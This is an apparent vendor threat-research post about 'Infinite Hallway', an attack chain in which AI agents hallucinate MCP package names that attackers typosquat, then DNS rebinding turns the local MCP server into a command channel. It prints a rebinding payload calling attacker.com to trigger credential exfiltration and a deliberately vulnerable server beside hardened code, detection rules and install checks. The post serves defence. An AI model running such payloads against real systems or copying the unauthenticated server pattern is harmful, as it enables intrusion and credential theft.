Infinite Hallway: How Hallucinated MCP Servers Become Attacker C2 on the Loopback

Maya Levi
"The Labyrinth's secret was never the monster at its center. It was that every corridor looked like the way out."

Executive summary

The Arrakis Threats Catalog files Plugin/MCP Supply Chain Compromise as T1.1 - a Configuration & Setup layer threat at the Deploy stage, currently scoring CRITICAL (Likelihood 4 × Impact 5 = 20) and mapped to OWASP LLM03 Supply Chain plus MITRE ATLAS Initial Access and Execution. The takeaway is simple: the moment an AI agent is allowed to discover and install its own tools, your supply chain is no longer human-reviewed - and attackers already know it.

We track one of its sharpest expressions under the codename Infinite Hallway - the hallucinated MCP tool that opens a door the agent never built, and that quietly leads back into the network.

  • The LLM attack surface has shifted from the prompt box to the protocol and tool layer.
  • Attackers chain hallucinated package names with typosquatting and DNS rebinding to turn loopback MCP servers into a C2 channel.
  • The blast radius is RCE plus broad credential theft from every service the local MCP can reach.
  • Immediate actions: block unauthenticated MCP servers, enforce cryptographic signing, and validate Origin and Host on every endpoint - including loopback.
Daedalus built the Labyrinth so no one inside could tell where they were. The Infinite Hallway works the same way - every door looks like the one the agent meant to open, but one of them leads back to your own machine.
🛡️
Why Arrakis matters here: Infinite Hallway lives in the seams between registry, manifest, and loopback - the exact surface Arrakis treats as a first-class control plane.

The origin story

The realization that AI ecosystems were suffering from critical supply chain vulnerabilities crystallized with the proliferation of the Model Context Protocol (MCP). Organizations raced to give isolated agents the ability to do things - read local files, query internal databases, fetch real-time web data - and ended up deploying agents with third-party plugins and MCP servers that had not been properly vetted.

This is precisely why the Arrakis catalog files T1.1 at the Configuration & Setup layer rather than treating it as a runtime exploit: by the time the agent is reasoning, the trust decision has already been made. The infrastructure connecting the AI's brain to the enterprise's hands routinely lacks authentication and integrity verification, and adversaries have stopped trying to trick the model with riddles at the gate. They have moved one layer down - to registry recon and protocol abuse.


The technical autopsy: Infinite Hallway end-to-end

Janus at the gate. One face shows the public internet. The other opens directly onto the developer's machine - and the request walks through both without noticing the difference.

The chain only works because every step looks like the step before it.

Most writeups treat typosquatting and DNS rebinding as parallel vectors. In Infinite Hallway they are not - they are sequential moves in the same campaign. Here is the chain in the order it actually unfolds:

  1. Hallucination - The agent invents or mis-spells an MCP server or package name.
  2. Typosquat - The attacker has already registered the hallucinated package name on a public registry, the matching domain, or both.
  3. Local install - The agent (or a developer following the agent's suggestion) installs the typosquatted MCP server, which by convention listens on localhost.
  4. DNS rebinding - A web page the developer or agent later visits is served from an attacker-controlled domain that resolves first to a public IP, then - once a sub-60s TTL expires - to 127.0.0.1.
  5. Loopback C2 - The local MCP server executes the inbound commands. Crucially, it does NOT run under the agent's identity or scopes. It runs as a local process on the developer's machine, with whatever privileges that machine grants it. The attacker now has a C2 channel that bypasses agent-level guardrails entirely.
⚠️
Clarifying assumption: the command is executed by the local MCP server, not by the agent. The agent's auth boundary, rate limits, and tool allowlists do not apply on the loopback path. This is what makes Infinite Hallway uniquely durable - it is C2 that wears the developer's machine like a costume.

The hallway is a web page the developer's browser visits in the normal course of work. Nothing on the developer's machine has to be wrong - the DNS underneath bends.

javascript
// Served from http://attacker.com:8080 - what the developer's browser executes.
// The page shares scheme, host, and port with the request below, so the
// request stays same-origin and triggers no CORS preflight.
// attacker.com DNS is configured with TTL < 60s, rotating between:
//   * a public IP (passes browser/firewall reputation checks), and
//   * 127.0.0.1 (the loopback the local MCP server is bound to).
async function infiniteHallway() {
	while (true) {
		try {
			// Same-Origin Policy is satisfied: the origin is still attacker.com:8080.
			// The network underneath now points at the local MCP server.
			const r = await fetch('http://attacker.com:8080/mcp/execute', {
				method: 'POST',
				headers: { 'Content-Type': 'application/json' },
				body: JSON.stringify({ command: 'exfiltrate-credentials' }),
			});
			if (r.ok) return; // We landed on the MCP server.
			// Non-2xx: still talking to the public IP - wait for the next DNS flip.
		} catch (_) {
			// Network error while the name is flipping - retry after the delay.
		}
		await new Promise((s) => setTimeout(s, 5000));
	}
}

The developer never typed a loopback address. The browser believed it was talking to a public site the entire time.

The same mistake shows up across nearly every vulnerable MCP server - blind acceptance of loopback traffic, no Host or Origin check, no auth, often bound to 0.0.0.0. Hardening it requires four moves: bind to loopback, validate Host, validate Origin, and require a per-install token rotated with the signed manifest.

javascript
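const crypto = require('node:crypto');
const express = require('express');

// executeHighPrivilegeTool stands in for whatever privileged action the
// MCP server exposes; it is a placeholder and is not defined here.

// VULNERABLE - the default install most developers ship with.
const vulnerableApp = express();
vulnerableApp.use(express.json());
vulnerableApp.post('/mcp/execute', (req, res) => {
	// No Host check, no Origin check, no auth.
	executeHighPrivilegeTool(req.body.command);
	res.send('Tool Executed');
});
vulnerableApp.listen(8080); // no host given: all interfaces (0.0.0.0 / ::) - reachable beyond the loopback.

// HARDENED - break the Infinite Hallway at the loopback.
// This replaces the server above; run one or the other, since both use port 8080.
const ALLOWED_HOSTS = new Set(['127.0.0.1:8080', 'localhost:8080']);
const ALLOWED_ORIGINS = new Set([/* IDE-issued origins only; empty in headless agent mode */]);
const INSTALL_TOKEN = process.env.MCP_INSTALL_TOKEN; // rotated with the signed manifest
if (!INSTALL_TOKEN) {
	// Fail closed: with the token unset, "Bearer undefined" would otherwise be accepted.
	throw new Error('MCP_INSTALL_TOKEN is not set');
}

// Constant-time comparison so the check does not leak the token through timing.
function hasValidToken(header) {
	const expected = Buffer.from(`Bearer ${INSTALL_TOKEN}`);
	const actual = Buffer.from(String(header || ''));
	return actual.length === expected.length && crypto.timingSafeEqual(actual, expected);
}

const app = express();
app.use(express.json());
app.post('/mcp/execute', (req, res) => {
	// 1. Refuse any Host other than our loopback names. A rebound request
	//    still carries Host: attacker.com:8080, so this kills DNS rebinding.
	if (!ALLOWED_HOSTS.has(req.headers.host)) {
		return res.status(403).send('Host mismatch - possible DNS rebinding');
	}
	// 2. Refuse if Origin is set and not in the IDE allowlist.
	const origin = req.headers.origin;
	if (origin && !ALLOWED_ORIGINS.has(origin)) {
		return res.status(403).send('Origin not allowlisted');
	}
	// 3. Refuse without the per-install bearer token.
	if (!hasValidToken(req.headers.authorization)) {
		return res.status(401).send('Missing or invalid install token');
	}
	executeHighPrivilegeTool(req.body.command);
	res.send('Tool Executed');
});

// 4. Bind explicitly to loopback. Never 0.0.0.0 in dev or prod.
app.listen(8080, '127.0.0.1');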

If your MCP server trusts the loopback interface, you have outsourced authentication to whoever rebinds a hostname to 127.0.0.1 first.

Framework mapping:

  • MITRE ATLAS: AML.T0010 (ML Supply Chain Compromise), AML.T0011 (User Execution).
  • OWASP LLM Top 10: LLM03 Supply Chain (2025 list), LLM07 Insecure Plugin Design (2023 list; the 2025 list reassigns LLM07 to System Prompt Leakage).

The attacker's playbook and attribution

A registry under attack does not look broken. It looks crowded - with copies.

The hall of Eidola. Every bust is a perfect copy - except one. Registry recon is just the modern art of carving the wrong twin.
🔎
Arrakis tracking note: registry-recon dwell times have shrunk from weeks to hours. Once a maintainer publishes a new MCP package, typosquat candidates appear on adjacent registries faster than most organizations refresh their internal allowlists. The window for human-only review has closed.

Threat actors targeting the MCP and plugin ecosystem are methodical. They operate on the assumption that organizations are deploying AI capabilities faster than security teams can audit integration code. They scrape GitHub and npm for newly published MCP tools, watch for popular repositories with weak maintainer security, and pre-register names that match common LLM hallucinations. They are not breaking the original package - they are publishing its double.

Once a foothold is achieved via a typosquatted package or a compromised update, the objective is rapid vertical escalation. MCP servers typically hold the credentials needed to access internal databases, file systems, and corporate SaaS - so a single compromised plugin often produces RCE plus credential theft across every connected service.


The fallout (systemic failure)

This is a repeat of historical cybersecurity mistakes, ported into the AI era. We built a massive ecosystem of agents and protocols that frequently fail to enforce basic web security primitives.

Unauthenticated MCP servers exposed in production are a catastrophic failure of basic network hygiene. Reliance on public registries without strict manifest integrity - allowing installation of packages whose checksums do not match, or that are absent from trusted registries - effectively outsources perimeter security to unverified contributors.
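
To make "strict manifest integrity" concrete, here is a minimal sketch of an install-time check, assuming a publisher signs a JSON manifest with Ed25519 and the manifest records a SHA-256 digest of the package artifact. The manifest field names (`name`, `version`, `sha256`), the `verifyInstall` helper, and the example package name are hypothetical; only the Node.js `crypto` calls are real APIs.

```javascript
const crypto = require('node:crypto');

// Verify the Ed25519 signature over the manifest bytes, then check that the
// artifact matches the SHA-256 digest the manifest records.
// The manifest layout used here is an assumption made for illustration.
function verifyInstall({ manifestBytes, signature, publisherPublicKey, artifactBytes }) {
	// For Ed25519 keys the algorithm argument must be null.
	const signed = crypto.verify(null, manifestBytes, publisherPublicKey, signature);
	if (!signed) return { ok: false, reason: 'manifest signature invalid' };

	const manifest = JSON.parse(manifestBytes.toString('utf8'));
	const digest = crypto.createHash('sha256').update(artifactBytes).digest('hex');
	if (digest !== manifest.sha256) return { ok: false, reason: 'artifact checksum mismatch' };

	return { ok: true, name: manifest.name, version: manifest.version };
}

// Demonstration with a throwaway key pair. In a real deployment the public
// key would come from an internal trust store, not be generated on the spot.
const { publicKey, privateKey } = crypto.generateKeyPairSync('ed25519');
const artifact = Buffer.from('package tarball bytes');
const manifestBytes = Buffer.from(JSON.stringify({
	name: 'example-mcp-server', // hypothetical package name
	version: '1.0.0',
	sha256: crypto.createHash('sha256').update(artifact).digest('hex'),
}));
const signature = crypto.sign(null, manifestBytes, privateKey);

const result = verifyInstall({
	manifestBytes,
	signature,
	publisherPublicKey: publicKey,
	artifactBytes: artifact,
});
console.log(result.ok ? 'install permitted' : `install blocked: ${result.reason}`);
```

The signature is checked before the manifest is parsed, so an installer following this pattern never acts on fields from a manifest it cannot attribute to a trusted publisher.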

🧭
Arrakis perspective: the durable fix is not another scanner bolted onto CI. It is treating the AI tool layer - registries, manifests, MCP endpoints, tool schemas - as a first-class control plane, with the same provenance, signing, and runtime attestation we already demand of code itself.

Governance and compliance posture

Where Infinite Hallway sits in your control map:

  • Third-party and AI supply chain risk - Treat MCP servers and agent plugins as third-party software. They belong in the same vendor-risk and SBOM workflow as any other dependency, with provenance, signing, and attestations recorded at install time.
  • Change management - Tool definitions are configuration. A schema change to an approved MCP tool is a change-control event, not a silent update; it should generate the same audit trail as a firewall rule change.
  • Segregation of duties - Autonomous tool discovery by an agent is, in effect, an unreviewed production deployment. Require a human approver in the loop for any new MCP server entering an environment that touches regulated data.
  • Audit and evidence - Maintain an immutable record of every MCP package installed, its signature, and the approver. Without this record, post-incident scoping for an Infinite Hallway-class compromise is effectively impossible.
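
The change-management and audit bullets above both depend on being able to say exactly which tool definition was approved. One way to sketch that, assuming tool definitions are plain JSON objects, is to hash a canonical serialization at approval time and compare it on every later load. The record fields and the helper names (`canonicalize`, `schemaHash`, `pinTool`, `hasDrifted`) are hypothetical.

```javascript
const crypto = require('node:crypto');

// Serialize with object keys sorted so key order does not change the hash.
// Assumes the value is JSON-serializable (no functions, no undefined).
function canonicalize(value) {
	if (Array.isArray(value)) return `[${value.map(canonicalize).join(',')}]`;
	if (value !== null && typeof value === 'object') {
		const body = Object.keys(value)
			.sort()
			.map((k) => `${JSON.stringify(k)}:${canonicalize(value[k])}`)
			.join(',');
		return `{${body}}`;
	}
	return JSON.stringify(value);
}

// SHA-256 over the canonical form of a tool definition.
function schemaHash(toolDefinition) {
	return crypto.createHash('sha256').update(canonicalize(toolDefinition)).digest('hex');
}

// Record created at approval time: what was approved, by whom, and its hash.
function pinTool(toolDefinition, version, approver) {
	return {
		name: toolDefinition.name,
		version,
		approver,
		sha256: schemaHash(toolDefinition),
	};
}

// True when the definition presented now differs from what was approved.
function hasDrifted(pin, toolDefinition) {
	return schemaHash(toolDefinition) !== pin.sha256;
}
```

A loader built on this would refuse the tool and open a change-control ticket whenever `hasDrifted` returns true, rather than accepting the new schema silently.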

Mapping to common frameworks:

  • NIST AI RMF - Govern 6.1 (third-party risk), Manage 4.1 (incident response readiness for AI components).
  • ISO/IEC 42001 - A.6.2.6 (AI system supply chain), A.8.4 (data and tool integrity).
  • SOC 2 (CC) - CC3.2 (vendor risk), CC7.1 (anomaly detection), CC8.1 (change management).

Detection and implementation checklist

The mitigations break cleanly into two lanes. Both are paste-ready.

Detection lane (SIEM / EDR rules):

  • Alert on DNS responses with TTL < 60s for any domain accessed by an AI agent or developer IDE process.
  • Alert on any domain that resolves to a public IP and then to a private or loopback IP within a single session.
  • Alert on outbound traffic from localhost-bound MCP processes to any non-allowlisted domain.
  • Alert on package install events where the requested name has high Levenshtein similarity to a known-popular MCP package but is not in the internal allowlist.
  • Alert on MCP tool-schema drift between sessions (hash mismatch on tool definition).
  • Alert on MCP endpoints accepting requests with missing or mismatched Origin or Host headers.
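
The first two detection rules can be prototyped over resolver logs before they are translated into a SIEM query language. The sketch below assumes a hypothetical event shape of `{ domain, ip, ttl, ts }` (TTL in seconds, timestamp in milliseconds) for a single session; real DNS telemetry will look different, and only IPv4 private ranges plus the two loopback forms are covered.

```javascript
// True for IPv4 loopback, the RFC 1918 private ranges, and IPv6 loopback.
// Other IPv6 internal ranges are out of scope for this sketch.
function isInternalAddress(ip) {
	if (ip === '::1') return true;
	const parts = ip.split('.').map(Number);
	if (parts.length !== 4 || parts.some((p) => !Number.isInteger(p) || p < 0 || p > 255)) {
		return false; // not a dotted-quad IPv4 address
	}
	const [a, b] = parts;
	return (
		a === 127 || // 127.0.0.0/8 loopback
		a === 10 || // 10.0.0.0/8
		(a === 172 && b >= 16 && b <= 31) || // 172.16.0.0/12
		(a === 192 && b === 168) // 192.168.0.0/16
	);
}

// Returns the domains that resolved to a public address and later, in the
// same session, to an internal one. Each result also notes whether any
// answer for that domain carried a TTL below the threshold.
function findRebindCandidates(events, ttlThreshold = 60) {
	const state = new Map(); // domain -> { sawPublic, flipped, minTtl }
	const ordered = [...events].sort((x, y) => x.ts - y.ts);
	for (const { domain, ip, ttl } of ordered) {
		const s = state.get(domain) || { sawPublic: false, flipped: false, minTtl: Infinity };
		if (isInternalAddress(ip)) {
			if (s.sawPublic) s.flipped = true;
		} else {
			s.sawPublic = true;
		}
		s.minTtl = Math.min(s.minTtl, ttl);
		state.set(domain, s);
	}
	return [...state.entries()]
		.filter(([, s]) => s.flipped)
		.map(([domain, s]) => ({ domain, shortTtl: s.minTtl < ttlThreshold }));
}
```

A domain that only ever resolves to an internal address, such as an intranet host, is not flagged; the signal is the public-to-internal transition, with the short TTL as supporting evidence.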

Implementation lane:

  • Require cryptographic signing on every MCP server package; block unsigned installs.
  • Pin MCP tool definitions (hash + version) at approval time; require re-approval on drift.
  • Enforce Origin and Host validation on every MCP endpoint, including loopback.
  • Require authentication on all MCP endpoints in production - no implicit loopback trust.
  • Maintain an internal allowlist registry; block public-registry installs by default.
  • Block installs of packages whose names are within an edit-distance threshold of allowlisted packages but are not themselves allowlisted.
  • Disable autonomous tool discovery in production agents; require human-in-the-loop for new tool registration.
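
The allowlist and edit-distance items above can be combined into a single install gate. This is a minimal sketch, assuming the allowlist is an in-memory array of package names and a threshold of 2 edits; the threshold, the `checkInstall` helper, and the decision labels are illustrative choices, not values from the Arrakis catalog.

```javascript
// Classic dynamic-programming Levenshtein distance
// (insertions, deletions, substitutions each cost 1).
function editDistance(a, b) {
	let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
	for (let i = 1; i <= a.length; i++) {
		const curr = [i];
		for (let j = 1; j <= b.length; j++) {
			const cost = a[i - 1] === b[j - 1] ? 0 : 1;
			curr[j] = Math.min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost);
		}
		prev = curr;
	}
	return prev[b.length];
}

// Decide what to do with a requested package name.
//   'allow'  - exact match on the allowlist
//   'block'  - not allowlisted, but within maxDistance of an allowlisted name
//   'review' - not allowlisted and not similar to anything; route to a human
function checkInstall(name, allowlist, maxDistance = 2) {
	if (allowlist.includes(name)) return { decision: 'allow' };
	for (const known of allowlist) {
		if (editDistance(name, known) <= maxDistance) {
			return { decision: 'block', resembles: known };
		}
	}
	return { decision: 'review' };
}
```

For example, with a hypothetical allowlist of `['mcp-server-files']`, a request for `mcp-server-flies` is two substitutions away and is blocked as a likely typosquat, while an unrelated name falls through to human review instead of being installed by default.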

How Arrakis secures the AI tool layer

Arrakis collapses the Infinite Hallway chain at the three points where it actually fires: the registry, the manifest, and the loopback. Continuous registry intelligence catches typosquats and hallucinated names before they enter the build. Manifest signing and tool-schema pinning turn every MCP install into a signed, version-locked event with an audit trail. Runtime attestation on the MCP endpoint enforces authentication plus Origin and Host validation, so a rebound request is dropped at the loopback rather than discovered after execution. Net effect: the AI tool layer is treated as a first-class control plane, with the same provenance and runtime rigor security teams already apply to code and network.


Validated indicators (Infinite Hallway)

| Indicator Type | Value | Description |
| --- | --- | --- |
| Attack vector | DNS rebinding | Protocol-level exploit that leverages rapid DNS resolution changes to bypass the Same-Origin Policy. |
| Telemetry anomaly | TTL < 60s | Rapid DNS TTL changes for domains accessed by agents. Primary indicator of DNS rebinding setup. |
| Telemetry anomaly | Public -> private IP resolution | DNS responses that resolve to a loopback or private IP after initially resolving to a public IP. |
| Registry anomaly | High package-name similarity | Requested package name is suspiciously similar to a popular package, indicating likely typosquatting. |
| Configuration vulnerability | Unauthenticated endpoints | MCP servers running without authorization and without Origin or Host validation. |
| Behavioral anomaly | Localhost MCP outbound | A localhost-bound MCP process initiating outbound traffic to non-allowlisted domains - candidate attacker C2. |
